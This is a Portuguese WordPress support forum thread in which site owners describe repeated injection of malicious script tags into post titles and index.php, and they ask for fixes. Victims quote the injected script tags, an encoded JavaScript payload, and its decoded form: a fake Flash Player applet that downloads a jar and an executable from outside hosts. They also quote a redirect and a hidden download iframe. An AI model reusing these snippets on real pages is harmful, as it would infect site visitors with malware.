• Resolvido João

    (@fernando-kerkhoff)


    boa tarde,

    isso já aconteceu umas 3x, inclusive com essa última versão, alguém insere um código no título do post, que chama um script, daí quando alguém abre o blog, executa esse script, e tenta instalar alguma coisa no pc da pessoa, imagino que algum trojan e talz, o que fazer para evitar isso?

    eu estou fazendo algo meio caseiro aqui, depois que eu atualizo, abre pelo ftp e mudo o nome da pasta admin, deve ter algum erro em alguma rotina desses arquivos que editam os posts, alguém sabe o que eu posso fazer para evitar isso?

    abraço

A visualizar 15 respostas - de 1 a 15 (de um total de 15)
  • Não existe qualquer tipo de erro, simplesmente não estás a filtrar o conteúdo que colocas “cá para fora”, usa por exemplo a função esc_attr ou wp_strip_all_tags e tens o problema resolvido

    Thread Starter João

    (@fernando-kerkhoff)

    aconteceu novamente, a pessoa colocou esse script em um titulo de um post do meu blog:

    <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script>

    ficou assim:

    Título <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script>

    daí quando abre o blog, pede para instalar algo estilo o java

    já te disse, NÃO ESTÁS A FILTRAR O TEU OUTPUT.

    usa por exemplo a função esc_attr ou wp_strip_all_tags e tens o problema resolvido

    Thread Starter João

    (@fernando-kerkhoff)

    esse arquivo .js dele tem isso dentro:

    document.write(unescape(‘%3C%61%70%70%6C%65%74%20%6E%61%6D%65%3D%22%41%64%6F%62%65%20%46%6C%61%73%68%20%50%6C%61%79%65%72%20%31%31%22%20%63%6F%64%65%3D%22%61%66%70%2E%63%6C%61%73%73%22%20%61%72%63%68%69%76%65%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%62%73%36%64%65%61%67%6F%73%74%6F%2E%63%6F%6D%2F%70%6F%72%74%61%6C%2F%6C%61%6E%67%75%61%67%65%2F%61%66%70%2E%6A%61%72%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%70%61%72%61%6D%20%6E%61%6D%65%3D%22%6C%69%6E%6B%22%20%76%61%6C%75%65%3D%22%68%74%74%70%3A%2F%2F%64%76%67%6D%65%74%74%69%6E%67%65%6E%2E%68%75%6E%64%65%2D%74%72%61%69%6E%69%6E%67%2E%69%6E%66%6F%2F%6C%61%6E%67%75%61%67%65%2F%6A%78%76%69%6E%73%74%61%6C%6C%2E%65%78%65%22%3E%3C%2F%61%70%70%6C%65%74%3E’));

    que descriptografado dá isso:

    <applet name=”Adobe Flash Player 11″ code=”afp.class” archive=”http://www.abs6deagosto.com/portal/language/afp.jar&#8221; width=”1″ height=”1″><param name=”link” value=”http://dvgmettingen.hunde-training.info/language/jxvinstall.exe”></applet&gt;

    Thread Starter João

    (@fernando-kerkhoff)

    pode me explicar como usar essas funções? onde eu coloco elas?

    Qual o tema que está a usar, e quais os plugins que tem instalado?

    Estou com o mesmo problema, retiro esse script do meu site <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script> , porém depois de algumas horas ele volta novamente pra index.php e para o titulo do primeiro post , não sei aonde está localizado o script que posta isso automáticamente 🙁

    Se alguém puder ajudar a retirar de vez essa praga agradeço 🙁

    Eu também estou com este problema e não acho solução na internet.

    será que estou a falar chinês?

    Moderador Zé Fontainhas

    (@vanillalounge)

    A ver se é desta… Como refere @cyclop, esse código (Javascript) só é possível ser colocado no título de um artigo por um utilizador com permissões de unfiltered_html, ou seja, Editores e Administradores.

    Note que Isto não é em nada diferente do que eles podem colocar no conteúdo do post.

    Isto não é nem uma vulnerabilidade nem um hack. Por favor consulte a documentação sobre unfiltered_html e pense bem se os seus autores têm mesmo que ter permissões de Editor ou Administrador.

    Com relação a publicação do script no titulo do post já foi resolvido com a o unfiltered_html , porém ele sempre está aparecendo na index.php com esse mesmo script , não sei como ele injeta esse código , já mudei todas as senhas e nada 🙁

    Abraços e Obrigado pela atenção de vocês 🙂

    manuelacoelhocrochet

    (@manuelacoelhocrochet)

    cyclop onde se coloca a função?

    Pessoal,

    estou tendo o mesmo problema, porém não uso wordpress! Não achei nenhum outro lugar na internet onde pessoas estejam tendo o mesmo problema, então decidi postar aqui.
    Depois de muita pesquisa fiquei ainda mais confuso, sou programador e a princípio pensei se tratar de uma injeção XSS/HTML (quando alguem adiciona um script através de campos de formulário ou via barra de endereços), mas parece não ser pois o arquivo tem sido editado na sua forma estática, quero dizer que o código fonte do HTML é alterado fisicamente no servidor, não apenas no cliente.
    Baixei o arquivo por FTP e lá estava ela, essa linha foi adicionada no meu index.php também, pude apagá-la e agora aguardo que modifiquem novamente para eu tentar rastrear, mas até então nada.
    Fizeram o mesmo em outro site do meu servidor, que possui senha diferente, então me preocupa que a pessoa tenha privilégios de super usuário (root).

    Em sequência acontece o seguinte (não executem o .exe no final, provavél virús/trojan)

    <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script>

    Que possui a seguinte instrução codificada, apenas redireciona para uma outra página, domínio de um restaurante japones na françca (provável que invadido também):
    <script>document.location.href=”http://www.sushido.fr/ads.js/?A”</script&gt;

    Que direciona através de uma página falsa da adobe (phishing) e executa o download automático através do iframe:

    <iframe src=”?D” width=”0″ height=”0″ frameborder=”0″ ></iframe>

    O que o executável faz só deus sabe!

    Se alguém tiver uma idéia de como essa pessoa entra no servidor, postem aqui.

    Abraço,

    Tiago

    a tag <script src=http://habiterraconsulting.com/xmlrpc/xmlrpc.js></script> vem antes do DOCTYPE, por incrivel que pareça, nunca ouvir falar de uma injeção antes do <html>, muito menos permanente.

    Bom, vamos lá:

    <script src=http://www.buhosfcxalapa.com/xmlrpc/ads.js/></script>

    <script src=http://www.buhosfcxalapa.com/xmlrpc/ads.js/></script> vem aparecendo quase todo dia isso para mim no título.

    Sempre nos novos artigos: blogpop.com.br

    Experimentei hoje colocar no arquivo single.php do tema a permissão 644 e estou esperando, já já digo para vocês se deu certo.

    abs

A visualizar 15 respostas - de 1 a 15 (de um total de 15)
  • O tópico ‘Alguém (Hacker?) insere um código que chama um script no título dos posts’ está fechado a novas respostas.